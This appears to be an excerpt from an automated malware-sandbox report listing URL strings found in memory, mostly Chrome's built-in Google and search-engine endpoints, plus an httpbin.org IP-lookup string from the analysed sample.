Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000004.00000002.2810196746.00005E1002570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2814055239.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811357384.00005E1002858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793877812.00005E1002E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787690379.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000004.00000002.2811357384.00005E1002858000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000004.00000002.2814122917.00005E1002E38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000004.00000002.2814055239.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793877812.00005E1002E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787690379.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000004.00000002.2814055239.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793877812.00005E1002E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787690379.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtaba
Source: chrome.exe, 00000004.00000002.2814055239.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793877812.00005E1002E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787690379.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: ELLRGATenShKoyKeRtXA.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.2780455423.00005C180039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780250962.00005C1800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
Source: chrome.exe, 00000004.00000002.2808251351.00005C180078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.2780455423.00005C180039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780250962.00005C1800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000004.00000002.2808251351.00005C180078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.2780455423.00005C180039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780250962.00005C1800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 00000004.00000002.2808735656.00005E100220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000004.00000002.2811357384.00005E1002858000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000004.00000002.2814396086.00005E1002EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444preferSkippingInvalidateForEmulatedFormats
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000004.00000002.2811787661.00005E1002944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2819161440.00005E10032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811520623.00005E10028CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000004.00000002.2811787661.00005E1002944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2819161440.00005E10032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811520623.00005E10028CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000004.00000002.2807306250.00005C1800238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000004.00000003.2780455423.00005C180039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780250962.00005C1800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000004.00000003.2780455423.00005C180039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780250962.00005C1800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000004.00000002.2808190294.00005C1800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000004.00000003.2794207961.00005E100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2794083915.00005E1003354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793915331.00005E10025A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000004.00000003.2794207961.00005E100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2794083915.00005E1003354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793915331.00005E10025A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000004.00000003.2781010480.00005C18006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2794083915.00005E1003354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793915331.00005E10025A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000004.00000002.2808251351.00005C180078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000004.00000002.2808251351.00005C180078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000004.00000002.2808165790.00005C1800744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000004.00000002.2810196746.00005E1002570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2811189215.00005E10027D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2815088555.00005E1002F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812150640.00005E1002A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810941726.00005E1002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000004.00000002.2810343819.00005E100260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2818982421.00005E10031F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812090905.00005E1002A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000004.00000002.2810343819.00005E100260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812090905.00005E1002A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2813814439.00005E1002DBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000004.00000002.2810343819.00005E100260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2818982421.00005E10031F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812090905.00005E1002A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000004.00000003.2791752281.00005E1003147000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812977553.00005E1002B9F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2813337413.00005E1002C60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000004.00000002.2809780010.00005E100240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000004.00000002.2813684303.00005E1002D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000004.00000002.2817455890.00005E1002FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2788164924.00005E1002BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2816567613.00005E1002F7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000004.00000002.2817455890.00005E1002FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2788164924.00005E1002BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2816567613.00005E1002F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2809164357.00005E10022E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000003.2788164924.00005E1002BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2816567613.00005E1002F7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000004.00000003.2788164924.00005E1002BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2816567613.00005E1002F7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000004.00000003.2788164924.00005E1002BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2816567613.00005E1002F7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000004.00000002.2817455890.00005E1002FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2809971002.00005E10024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2788164924.00005E1002BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2816567613.00005E1002F7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000004.00000002.2817455890.00005E1002FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2788164924.00005E1002BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2816567613.00005E1002F7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000003.2788164924.00005E1002BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2816567613.00005E1002F7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000004.00000003.2791752281.00005E1003147000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812977553.00005E1002B9F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2813337413.00005E1002C60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000003.2794207961.00005E100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2794083915.00005E1003354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793915331.00005E10025A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000002.2813337413.00005E1002C60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000004.00000002.2808983052.00005E100228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000004.00000002.2809100442.00005E10022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000004.00000002.2811787661.00005E1002944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2818301794.00005E1003080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811520623.00005E10028CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2811787661.00005E1002944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2818301794.00005E1003080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811520623.00005E10028CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000004.00000002.2813226844.00005E1002C18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000004.00000002.2812742080.00005E1002B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ww.google.com/
Source: chrome.exe, 00000004.00000002.2813981084.00005E1002E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.2814122917.00005E1002E38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.2814122917.00005E1002E38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.2814122917.00005E1002E38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000002.2808764258.00005E100221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.2811847664.00005E1002984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/CharKk3
Source: chrome.exe, 00000004.00000002.2818301794.00005E1003080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814193544.00005E1002E48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000004.00000002.2814193544.00005E1002E48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2ageHandler
Source: chrome.exe, 00000004.00000002.2818301794.00005E1003080000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2r
Source: chrome.exe, 00000004.00000002.2818411738.00005E10030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2819334440.00005E1003334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 00000004.00000002.2818411738.00005E10030A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0X/
Source: chrome.exe, 00000004.00000002.2817949323.00005E100300C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000004.00000002.2811816106.00005E1002960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812660676.00005E1002B34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2818742264.00005E1003140000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.2811816106.00005E1002960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812660676.00005E1002B34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2818742264.00005E1003140000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.2812776121.00005E1002B68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.2811189215.00005E10027D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812150640.00005E1002A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810941726.00005E1002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2812150640.00005E1002A2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000004.00000003.2793915331.00005E10025A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2813299911.00005E1002C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2808764258.00005E100221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2809780010.00005E100240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2809780010.00005E100240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2811189215.00005E10027D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2809780010.00005E100240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2818146753.00005E100304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2809780010.00005E100240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
